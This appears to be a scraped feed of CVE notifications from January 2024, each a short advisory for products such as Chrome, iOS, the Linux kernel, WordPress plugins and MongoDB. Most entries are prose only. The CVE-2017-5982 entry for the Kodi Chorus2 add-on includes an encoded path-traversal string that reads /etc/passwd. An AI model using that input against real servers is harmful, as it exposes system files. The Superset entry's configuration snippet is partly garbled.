🚨 CVE-2024-21765Electronic Delivery Check System (Doboku) Ver.18.1.0 and earlier, Electronic Delivery Check System (Dentsu) Ver.12.1.0 and earlier, Electronic Delivery Check System (Kikai) Ver.10.1.0 and earlier, and Electronic delivery item Inspection Support SystemVer.4.0.31 and earlier improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.🎖@cveNotify |
|
| 2024-01-24 02:07:24 |
🚨 CVE-2024-23222A type confusion issue was addressed with improved checks. This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-01-24 01:37:24 |
🚨 CVE-2022-4964Ubuntu's pipewire-pulse in snap grants microphone access even when the snap interface for audio-record is not set.🎖@cveNotify |
|
| 2024-01-24 00:37:36 |
🚨 CVE-2024-23453Android Spoon application version 7.11.1 to 8.6.0 uses hard-coded credentials, which may allow a local attacker to retrieve the hard-coded API key when the application binary is reverse-engineered. This API key may be used for unexpected access of the associated service.🎖@cveNotify |
|
| 2024-01-24 00:37:35 |
🚨 CVE-2024-0814Incorrect security UI in Payments in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-01-24 00:37:31 |
🚨 CVE-2024-0812Inappropriate implementation in Accessibility in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-24 00:37:30 |
🚨 CVE-2024-0809Inappropriate implementation in Autofill in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-01-24 00:37:25 |
🚨 CVE-2024-0805Inappropriate implementation in Downloads in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-01-24 00:37:24 |
🚨 CVE-2024-0804Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-01-23 22:37:32 |
🚨 CVE-2023-51208An Arbitrary File Upload vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code and cause other impacts via upload of crafted file.🎖@cveNotify |
|
| 2024-01-23 22:37:26 |
🚨 CVE-2023-51201Cleartext Transmission issue in ROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to access sensitive information via a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-01-23 22:37:25 |
🚨 CVE-2023-31654Redis raft master-1b8bd86 to master-7b46079 was discovered to contain an ODR violation via the component hiredisAllocFns at /opt/fs/redisraft/deps/hiredis/alloc.c.🎖@cveNotify |
|
| 2024-01-23 22:37:24 |
🚨 CVE-2021-42142An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers mishandle the early use of a large epoch number. This vulnerability allows remote attackers to cause a denial of service and false-positive packet drops.🎖@cveNotify |
|
| 2024-01-23 22:07:25 |
🚨 CVE-2022-41619Missing Authorization vulnerability in SedLex Image Zoom.This issue affects Image Zoom: from n/a through 1.8.8.🎖@cveNotify |
|
| 2024-01-23 22:07:24 |
🚨 CVE-2023-46952Cross Site Scripting vulnerability in ABO.CMS v.5.9.3 allows an attacker to execute arbitrary code via a crafted payload to the Referer header.🎖@cveNotify |
|
| 2024-01-23 21:37:32 |
🚨 CVE-2023-38626A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This is a similar, but not identical vulnerability as CVE-2023-38625.🎖@cveNotify |
|
| 2024-01-23 21:37:26 |
🚨 CVE-2023-38625A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This is a similar, but not identical vulnerability as CVE-2023-38624.🎖@cveNotify |
|
| 2024-01-23 21:37:25 |
🚨 CVE-2024-0558A vulnerability has been found in DedeBIZ 6.3.0 and classified as critical. This vulnerability affects unknown code of the file /admin/makehtml_freelist_action.php. The manipulation of the argument startid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250726 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-23 21:37:24 |
🚨 CVE-2023-6129Issue summary: The POLY1305 MAC (message authentication code) implementationcontains a bug that might corrupt the internal state of applications runningon PowerPC CPU based platforms if the CPU provides vector instructions.Impact summary: If an attacker can influence whether the POLY1305 MACalgorithm is used, the application state might be corrupted with variousapplication dependent consequences.The POLY1305 MAC (message authentication code) implementation in OpenSSL forPowerPC CPUs restores the contents of vector registers in a different orderthan they are saved. Thus the contents of some of these vector registersare corrupted when returning to the caller. The vulnerable code is used onlyon newer PowerPC processors supporting the PowerISA 2.07 instructions.The consequences of this kind of internal application state corruption canbe various - from no consequences, if the calling application does notdepend on the contents of non-volatile XMM registers at all, to the worstconsequences, where the attacker could get complete control of the applicationprocess. However unless the compiler uses the vector registers for storingpointers, the most likely consequence, if any, would be an incorrect resultof some application dependent calculations or a crash leading to a denial ofservice.The POLY1305 MAC algorithm is most frequently used as part of theCHACHA20-POLY1305 AEAD (authenticated encryption with associated data)algorithm. The most common usage of this AEAD cipher is with TLS protocolversions 1.2 and 1.3. If this cipher is enabled on the server a maliciousclient can influence whether this AEAD cipher is used. This implies thatTLS server applications using OpenSSL can be potentially impacted. Howeverwe are currently not aware of any concrete application that would be affectedby this issue therefore we consider this a Low severity security issue.🎖@cveNotify |
|
| 2024-01-23 21:07:32 |
🚨 CVE-2022-23179The Contact Form & Lead Form Elementor Builder WordPress plugin before 1.7.0 does not escape some of its form fields before outputting them in attributes, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed🎖@cveNotify |
|
| 2024-01-23 21:07:26 |
🚨 CVE-2021-24433The simple sort&search WordPress plugin through 0.0.3 does not make sure that the indexurl parameter of the shortcodes "category_sims", "order_sims", "orderby_sims", "period_sims", and "tag_sims" use allowed URL protocols, which can lead to stored cross-site scripting by users with a role as low as Contributor🎖@cveNotify |
|
| 2024-01-23 21:07:25 |
🚨 CVE-2023-7206In Horner Automation Cscape versions 9.90 SP10 and prior, local attackers are able to exploit this vulnerability if a user opens a malicious CSP file, which would result in execution of arbitrary code on affected installations of Cscape.🎖@cveNotify |
|
| 2024-01-23 21:07:24 |
🚨 CVE-2024-0562A use-after-free flaw was found in the Linux Kernel. When a disk is removed, bdi_unregister is called to stop further write-back and waits for associated delayed work to complete. However, wb_inode_writeback_end() may schedule bandwidth estimation work after this has completed, which can result in the timer attempting to access the recently freed bdi_writeback.🎖@cveNotify |
|
| 2024-01-23 20:37:32 |
🚨 CVE-2023-42143Missing Integrity Check in Shelly TRV 20220811-152343/v2.1.8@5afc928c allows malicious users to create a backdoor by redirecting the device to an attacker-controlled machine which serves the manipulated firmware file. The device is updated with the manipulated firmware.🎖@cveNotify |
|
| 2024-01-23 20:37:25 |
🚨 CVE-2023-47459An issue in Knovos Discovery v.22.67.0 allows a remote attacker to obtain sensitive information via the /DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName component.🎖@cveNotify |
|
| 2024-01-23 20:37:24 |
🚨 CVE-2024-0565An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.🎖@cveNotify |
|
| 2024-01-23 20:07:32 |
🚨 CVE-2023-37522HCL BigFix Bare OSD Metal Server WebUI version 311.19 or lower has missing or insecure tags that could allow an attacker to execute a malicious script on the user's browser.🎖@cveNotify |
|
| 2024-01-23 20:07:26 |
🚨 CVE-2023-2252The Directorist WordPress plugin before 7.5.4 is vulnerable to Local File Inclusion as it does not validate the file parameter when importing CSV files.🎖@cveNotify |
|
| 2024-01-23 20:07:25 |
🚨 CVE-2024-0555A Cross-Site Request Forgery (CSRF) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could lead another user into executing unwanted actions inside the application they are logged in. This vulnerability is possible due to the lack of propper CSRF token implementation.🎖@cveNotify |
|
| 2024-01-23 20:07:24 |
🚨 CVE-2024-22207fastify-swagger-ui is a Fastify plugin for serving Swagger UI. Prior to 2.1.0, the default configuration of `@fastify/swagger-ui` without `baseDir` set will lead to all files in the module's directory being exposed via http routes served by the module. The vulnerability is fixed in v2.1.0. Setting the `baseDir` option can also work around this vulnerability.🎖@cveNotify |
|
| 2024-01-23 19:37:33 |
🚨 CVE-2024-20709Acrobat Reader T5 (MSFT Edge) versions 120.0.2210.91 and earlier are affected by an Improper Input Validation vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-01-23 19:37:26 |
🚨 CVE-2023-4001An authentication bypass flaw was found in GRUB due to the way that GRUB uses the UUID of a device to search for the configuration file that contains the password hash for the GRUB password protection feature. An attacker capable of attaching an external drive such as a USB stick containing a file system with a duplicate UUID (the same as in the "/boot/" file system) can bypass the GRUB password protection feature on UEFI systems, which enumerate removable drives before non-removable ones. This issue was introduced in a downstream patch in Red Hat's version of grub2 and does not affect the upstream package.🎖@cveNotify |
|
| 2024-01-23 19:37:25 |
🚨 CVE-2022-45794An attacker with network access to the affected PLC (CJ-series and CS-series PLCs, all versions) may use a network protocol to read and write files on the PLC internal memory and memory card.🎖@cveNotify |
|
| 2024-01-23 19:37:24 |
🚨 CVE-2024-22049httparty before 0.21.0 is vulnerable to an assumed-immutable web parameter vulnerability. A remote and unauthenticated attacker can provide a crafted filename parameter during multipart/form-data uploads which could result in attacker controlled filenames being written.🎖@cveNotify |
|
| 2024-01-23 19:07:25 |
🚨 CVE-2022-1617The WP-Invoice WordPress plugin through 4.3.1 does not have CSRF check in place when updating its settings, and is lacking sanitisation as well as escaping in some of them, allowing attacker to make a logged in admin change them and add XSS payload in them🎖@cveNotify |
|
| 2024-01-23 19:07:24 |
🚨 CVE-2024-0582A memory leak flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-23 18:37:32 |
🚨 CVE-2024-22203Whoogle Search is a self-hosted metasearch engine. In versions prior to 0.8.4, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a GET request on lines 339-343 in `request.py`, which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4.🎖@cveNotify |
|
| 2024-01-23 18:37:26 |
🚨 CVE-2023-6573HPE OneView may have a missing passphrase during restore.🎖@cveNotify |
|
| 2024-01-23 18:37:25 |
🚨 CVE-2024-22362Drupal contains a vulnerability with improper handling of structural elements. If this vulnerability is exploited, an attacker may be able to cause a denial-of-service (DoS) condition.🎖@cveNotify |
|
| 2024-01-23 18:37:24 |
🚨 CVE-2023-51282An issue in mingSoft MCMS v.5.2.4 allows a a remote attacker to obtain sensitive information via a crafted script to the password parameter.🎖@cveNotify |
|
| 2024-01-23 18:07:25 |
🚨 CVE-2016-10886The wp-editor plugin before 1.2.6 for WordPress has incorrect permissions.🎖@cveNotify |
|
| 2024-01-23 18:07:24 |
🚨 CVE-2016-10885The wp-editor plugin before 1.2.6 for WordPress has CSRF.🎖@cveNotify |
|
| 2024-01-23 17:37:32 |
🚨 CVE-2021-32039Users with appropriate file access may be able to access unencrypted user credentials saved by MongoDB Extension for VS Code in a binary file. These credentials may be used by malicious attackers to perform unauthorized actions. This vulnerability affects all MongoDB Extension for VS Code including and prior to version 0.7.0🎖@cveNotify |
|
| 2024-01-23 17:37:26 |
🚨 CVE-2021-32037An authorized user may trigger an invariant which may result in denial of service or server exit if a relevant aggregation request is sent to a shard. Usually, the requests are sent via mongos and special privileges are required in order to know the address of the shards and to log in to the shards of an auth enabled environment. This issue affects MongoDB Server v5.0 versions prior to and including 5.0.2.🎖@cveNotify |
|
| 2024-01-23 17:37:25 |
🚨 CVE-2021-20331Specific versions of the MongoDB C# Driver may erroneously publish events containing authentication-related data to a command listener configured by an application. The published events may contain security-sensitive data when commands such as "saslStart", "saslContinue", "isMaster", "createUser", and "updateUser" are executed. Without due care, an application may inadvertently expose this authenticated-related information, e.g., by writing it to a log file. This issue only arises if an application enables the command listener feature (this is not enabled by default). This issue affects the MongoDB C# Driver v2.12 versions prior to and including 2.12.1.🎖@cveNotify |
|
| 2024-01-23 17:37:24 |
🚨 CVE-2021-20335For MongoDB Ops Manager versions prior to and including 4.2.24 with multiple OM application servers, that have SSL turned on for their MongoDB processes, the upgrade to MongoDB Ops Manager versions prior to and including 4.4.12 triggers a bug where Automation thinks SSL is being turned off, and can disable SSL temporarily for members of the cluster. This issue is temporary and eventually corrects itself after MongoDB Ops Manager instances have finished upgrading to MongoDB Ops Manager 4.4. In addition, customers must be running with clientCertificateMode=OPTIONAL / allowConnectionsWithoutCertificates=true to be impacted*.* Customers upgrading from Ops Manager 4.2.X to 4.2.24 and finally to Ops Manager 4.4.13+ are unaffected by this issue.🎖@cveNotify |
|
| 2024-01-23 17:07:26 |
🚨 CVE-2024-0603A vulnerability classified as critical has been found in ZhiCms up to 4.0. This affects an unknown part of the file app/plug/controller/giftcontroller.php. The manipulation of the argument mylike leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250839.🎖@cveNotify |
|
| 2024-01-23 17:07:25 |
🚨 CVE-2023-4969A GPU kernel can read sensitive data from another GPU kernel (even from another user or app) through an optimized GPU memory region called _local memory_ on various architectures.🎖@cveNotify |
|
| 2024-01-23 17:07:24 |
🚨 CVE-2023-4757The Staff / Employee Business Directory for Active Directory WordPress plugin before 1.2.3 does not sanitize and escape data returned from the LDAP server before rendering it in the page, allowing users who can control their entries in the LDAP directory to inject malicious javascript which could be used against high-privilege users such as a site admin.🎖@cveNotify |
|
| 2024-01-23 16:07:36 |
🚨 CVE-2023-49783Silverstripe Admin provides a basic management interface for the Silverstripe Framework. In versions on the 1.x branch prior to 1.13.19 and on the 2.x branch prior to 2.1.8, users who don't have edit or delete permissions for records exposed in a `ModelAdmin` can still edit or delete records using the CSV import form, provided they have create permissions. The likelihood of a user having create permissions but not having edit or delete permissions is low, but it is possible. Note that this doesn't affect any `ModelAdmin` which has had the import form disabled via the `showImportForm` public property. Versions 1.13.19 and 2.1.8 contain a patch for the issue. Those who have a custom implementation of `BulkLoader` should update their implementations to respect permissions when the return value of `getCheckPermissions()` is true. Those who use any `BulkLoader` in their own project logic, or maintain a module which uses it, should consider passing `true` to `setCheckPermissions()` if the data is provided by users.🎖@cveNotify |
|
| 2024-01-23 16:07:35 |
🚨 CVE-2023-48714Silverstripe Framework is the framework that forms the base of the Silverstripe content management system. Prior to versions 4.13.39 and 5.1.11, if a user should not be able to see a record, but that record can be added to a `GridField` using the `GridFieldAddExistingAutocompleter` component, the record's title can be accessed by that user. Versions 4.13.39 and 5.1.11 contain a fix for this issue.🎖@cveNotify |
|
| 2024-01-23 16:07:32 |
🚨 CVE-2023-44401The Silverstripe CMS GraphQL Server serves Silverstripe data as GraphQL representations. In versions 4.0.0 prior to 4.3.7 and 5.0.0 prior to 5.1.3, `canView` permission checks are bypassed for ORM data in paginated GraphQL query results where the total number of records is greater than the number of records per page. Note that this also affects GraphQL queries which have a limit applied, even if the query isn’t paginated per se. This has been fixed in versions 4.3.7 and 5.1.3 by ensuring no new records are pulled in from the database after performing `canView` permission checks for each page of results. This may result in some pages in the query results having less than the maximum number of records per page even when there are more pages of results. This behavior is consistent with how pagination works in other areas of Silverstripe CMS, such as in `GridField`, and is a result of having to perform permission checks in PHP rather than in the database directly. One may disable these permission checks by disabling the `CanViewPermission` plugin.🎖@cveNotify |
|
| 2024-01-23 16:07:31 |
🚨 CVE-2024-0187The Community by PeepSo WordPress plugin before 6.3.1.2 does not sanitise and escape various parameters and generated URLs before outputting them back attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-01-23 16:07:30 |
🚨 CVE-2023-7151The Product Enquiry for WooCommerce WordPress plugin before 3.2 does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-01-23 16:07:26 |
🚨 CVE-2023-45235EDK2's Network Package is susceptible to a buffer overflow vulnerability whenhandling Server ID option from a DHCPv6 proxy Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability.🎖@cveNotify |
|
| 2024-01-23 16:07:25 |
🚨 CVE-2023-45231EDK2's Network Package is susceptible to an out-of-bounds read vulnerability when processing Neighbor Discovery Redirect message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.🎖@cveNotify |
|
| 2024-01-23 15:37:43 |
🚨 CVE-2024-22662TOTOLINK A3700R_V9.1.2u.6165_20211012 has a stack overflow vulnerability via setParentalRules🎖@cveNotify |
|
| 2024-01-23 15:37:42 |
🚨 CVE-2023-49657A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS.For 2.X versions, users should change their config to include:TALISMAN_CONFIG = { "content_security_policy": { "base-uri": ["'self'"], "default-src": ["'self'"], "img-src": ["'self'", "blob:", "data:"], "worker-src": ["'self'", "blob:"], "connect-src": [ "'self'", " https://api.mapbox.com" https://api.mapbox.com" ;, " https://events.mapbox.com" https://events.mapbox.com" ;, ], "object-src": "'none'", "style-src": [ "'self'", "'unsafe-inline'", ], "script-src": ["'self'", "'strict-dynamic'"], }, "content_security_policy_nonce_in": ["script-src"], "force_https": False, "session_cookie_secure": False,}🎖@cveNotify |
|
| 2024-01-23 15:37:41 |
🚨 CVE-2023-7125The Community by PeepSo WordPress plugin before 6.3.1.2 does not have CSRF check when creating a user post (visible on their wall in their profile page), which could allow attackers to make logged in users perform such action via a CSRF attack🎖@cveNotify |
|
| 2024-01-23 15:37:37 |
🚨 CVE-2018-25004A user authorized to performing a specific type of query may trigger a denial of service by issuing a generic explain command on a find query. This issue affects MongoDB Server v4.0 versions prior to 4.0.6 and MongoDB Server v3.6 versions prior to 3.6.11.🎖@cveNotify |
|
| 2024-01-23 15:37:36 |
🚨 CVE-2019-20925An unauthenticated client can trigger denial of service by issuing specially crafted wire protocol messages, which cause the message decompressor to incorrectly allocate memory. This issue affects MongoDB Server v4.2 versions prior to 4.2.1; MongoDB Server v4.0 versions prior to 4.0.13; MongoDB Server v3.6 versions prior to 3.6.15 and MongoDB Server v3.4 versions prior to 3.4.24.🎖@cveNotify |
|
| 2024-01-23 15:07:32 |
🚨 CVE-2023-6741The WP Customer Area WordPress plugin before 8.2.1 does not properly validate users capabilities in some of its AJAX actions, allowing malicious users to edit other users' account address.🎖@cveNotify |
|
| 2024-01-23 15:07:26 |
🚨 CVE-2023-6732The Ultimate Maps by Supsystic WordPress plugin before 1.2.16 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed🎖@cveNotify |
|
| 2024-01-23 15:07:25 |
🚨 CVE-2023-6292The Ecwid Ecommerce Shopping Cart WordPress plugin before 6.12.5 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.🎖@cveNotify |
|
| 2024-01-23 15:07:24 |
🚨 CVE-2023-5922The Royal Elementor Addons and Templates WordPress plugin before 1.3.81 does not ensure that users accessing posts via an AJAX action (and REST endpoint, currently disabled in the plugin) have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts/pages content🎖@cveNotify |
|
| 2024-01-23 14:37:33 |
🚨 CVE-2023-2655The Contact Form by WD WordPress plugin through 1.13.23 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin🎖@cveNotify |
|
| 2024-01-23 14:37:26 |
🚨 CVE-2023-1405The Formidable Forms WordPress plugin before 6.2 unserializes user input, which could allow anonymous users to perform PHP Object Injection when a suitable gadget is present.🎖@cveNotify |
|
| 2024-01-23 14:37:25 |
🚨 CVE-2023-38545This flaw makes curl overflow a heap based buffer in the SOCKS5 proxyhandshake.When curl is asked to pass along the host name to the SOCKS5 proxy to allowthat to resolve the address instead of it getting done by curl itself, themaximum length that host name can be is 255 bytes.If the host name is detected to be longer, curl switches to local nameresolving and instead passes on the resolved address only. Due to this bug,the local variable that means "let the host resolve the name" could get thewrong value during a slow SOCKS5 handshake, and contrary to the intention,copy the too long host name to the target buffer instead of copying just theresolved address there.The target buffer being a heap based buffer, and the host name coming from theURL that curl has been told to operate with.🎖@cveNotify |
|
| 2024-01-23 14:37:24 |
🚨 CVE-2023-38039When curl retrieves an HTTP response, it stores the incoming headers so thatthey can be accessed later via the libcurl headers API.However, curl did not have a limit in how many or how large headers it wouldaccept in a response, allowing a malicious server to stream an endless seriesof headers and eventually cause curl to run out of heap memory.🎖@cveNotify |
|
| 2024-01-23 14:07:42 |
🚨 CVE-2023-42915Multiple issues were addressed by updating to curl version 8.4.0. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 16.7.5 and iPadOS 16.7.5. Multiple issues in curl.🎖@cveNotify |
|
| 2024-01-23 14:07:41 |
🚨 CVE-2023-42887An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2. An app may be able to read arbitrary files.🎖@cveNotify |
|
| 2024-01-23 14:07:40 |
🚨 CVE-2023-40528This issue was addressed by removing the vulnerable code. This issue is fixed in tvOS 17, watchOS 10, macOS Sonoma 14, iOS 17 and iPadOS 17, macOS Ventura 13.6.4. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2024-01-23 14:07:36 |
🚨 CVE-2024-23342The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Versions 0.18.0 and prior are vulnerable to the Minerva attack. As of time of publication, no known patched version exists.🎖@cveNotify |
|
| 2024-01-23 14:07:35 |
🚨 CVE-2021-42141An issue was discovered in Contiki-NG tinyDTLS through 2018-08-30. One incorrect handshake could complete with different epoch numbers in the packets Client_Hello, Client_key_exchange, and Change_cipher_spec, which may cause denial of service.🎖@cveNotify |
|
| 2024-01-23 14:07:31 |
🚨 CVE-2024-23677In Splunk Enterprise versions below 9.0.8, the Splunk RapidDiag utility discloses server responses from external applications in a log file.🎖@cveNotify |
|
| 2024-01-23 14:07:30 |
🚨 CVE-2023-47141IIBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270264.🎖@cveNotify |
|
| 2024-01-23 14:07:26 |
🚨 CVE-2023-24135Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a command injection vulnerability in the function formWriteFacMac. This vulnerability allows attackers to execute arbitrary commands via manipulation of the mac parameter.🎖@cveNotify |
|
| 2024-01-23 14:07:25 |
🚨 CVE-2023-49106Missing Password Field Masking vulnerability in Hitachi Device Manager on Windows, Linux (Device Manager Agent component).This issue affects Hitachi Device Manager: before 8.8.5-04.🎖@cveNotify |
|
| 2024-01-23 11:37:32 |
🚨 CVE-2024-22705An issue was discovered in ksmbd in the Linux kernel before 6.6.10. smb2_get_data_area_len in fs/smb/server/smb2misc.c can cause an smb_strndup_from_utf16 out-of-bounds access because the relationship between Name data and CreateContexts data is mishandled.🎖@cveNotify |
|
| 2024-01-23 11:37:26 |
🚨 CVE-2024-22076MyQ Print Server before 8.2 patch 43 allows Unauthenticated Remote Code Execution.🎖@cveNotify |
|
| 2024-01-23 11:37:25 |
🚨 CVE-2023-51042In the Linux kernel before 6.4.12, amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c has a fence use-after-free.🎖@cveNotify |
|
| 2024-01-23 11:37:24 |
🚨 CVE-2018-19183ethereumjs-vm 2.4.0 allows attackers to cause a denial of service (vm.runCode failure and REVERT) via a "code: Buffer.from(my_code, 'hex')" attribute. NOTE: the vendor disputes this because REVERT is a normal bytecode that can be triggered from high-level source code, leading to a normal programmatic execution result.🎖@cveNotify |
|
| 2024-01-23 10:37:32 |
🚨 CVE-2024-23183Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute an arbitrary script on the logged-in user's web browser.🎖@cveNotify |
|
| 2024-01-23 10:37:26 |
🚨 CVE-2024-23182Relative path traversal vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to delete arbitrary files on the server.🎖@cveNotify |
|
| 2024-01-23 10:37:25 |
🚨 CVE-2023-46343In the Linux kernel before 6.5.9, there is a NULL pointer dereference in send_acknowledge in net/nfc/nci/spi.c.🎖@cveNotify |
|
| 2024-01-23 10:37:24 |
🚨 CVE-2023-40072OS command injection vulnerability in ELECOM network devices allows an authenticated user to execute an arbitrary OS command by sending a specially crafted request. Affected products and versions are as follows: WAB-S600-PS all versions, WAB-S300 all versions, WAB-M1775-PS v1.1.21 and earlier, WAB-S1775 v1.1.9 and earlier, and WAB-S1167 v1.0.7 and earlier.🎖@cveNotify |
|
| 2024-01-23 09:37:25 |
🚨 CVE-2024-23849In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access.🎖@cveNotify |
|
| 2024-01-23 09:37:24 |
🚨 CVE-2024-23848In the Linux kernel through 6.7.1, there is a use-after-free in cec_queue_msg_fh, related to drivers/media/cec/core/cec-adap.c and drivers/media/cec/core/cec-api.c.🎖@cveNotify |
|
| 2024-01-23 07:37:26 |
🚨 CVE-2023-30207A divide by zero issue discovered in Kodi Home Theater Software 19.5 and earlier allows attackers to cause a denial of service via use of crafted mp3 file.🎖@cveNotify |
|
| 2024-01-23 07:37:25 |
🚨 CVE-2021-42917Buffer overflow vulnerability in Kodi xbmc up to 19.0, allows attackers to cause a denial of service due to improper length of values passed to istream.🎖@cveNotify |
|
| 2024-01-23 07:37:24 |
🚨 CVE-2017-5982Directory traversal vulnerability in the Chorus2 2.4.2 add-on for Kodi allows remote attackers to read arbitrary files via a %2E%2E%252e (encoded dot dot slash) in the image path, as demonstrated by image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd.🎖@cveNotify |
|
| 2024-01-23 05:37:32 |
🚨 CVE-2024-23842Improper Input Validation in Hitron Systems DVR LGUVR-16H 1.02~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW.🎖@cveNotify |
|
| 2024-01-23 05:37:25 |
🚨 CVE-2024-22770Improper Input Validation in Hitron Systems DVR HVR-16781 1.03~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW.🎖@cveNotify |
|
| 2024-01-23 05:37:24 |
🚨 CVE-2024-22768Improper Input Validation in Hitron Systems DVR HVR-4781 1.03~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW.🎖@cveNotify |
|
| 2024-01-23 03:37:32 |
🚨 CVE-2023-39197An out-of-bounds read vulnerability was found in Netfilter Connection Tracking (conntrack) in the Linux kernel. This flaw allows a remote user to disclose sensitive information via the DCCP protocol.🎖@cveNotify |
|
| 2024-01-23 03:37:26 |
🚨 CVE-2023-42935An authentication issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.6.4. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen.🎖@cveNotify |
|
| 2024-01-23 03:37:25 |
🚨 CVE-2023-5341A heap use-after-free flaw was found in coders/bmp.c in ImageMagick.🎖@cveNotify |
|
| 2024-01-23 03:37:24 |
🚨 CVE-2022-48541A memory leak in ImageMagick 7.0.10-45 and 6.9.11-22 allows remote attackers to perform a denial of service via the "identify -help" command.🎖@cveNotify |
|
| 2024-01-23 02:07:24 |
🚨 CVE-2023-34048vCenter Server contains an out-of-bounds write vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger an out-of-bounds write potentially leading to remote code execution.🎖@cveNotify |
|
| 2024-01-23 01:37:32 |
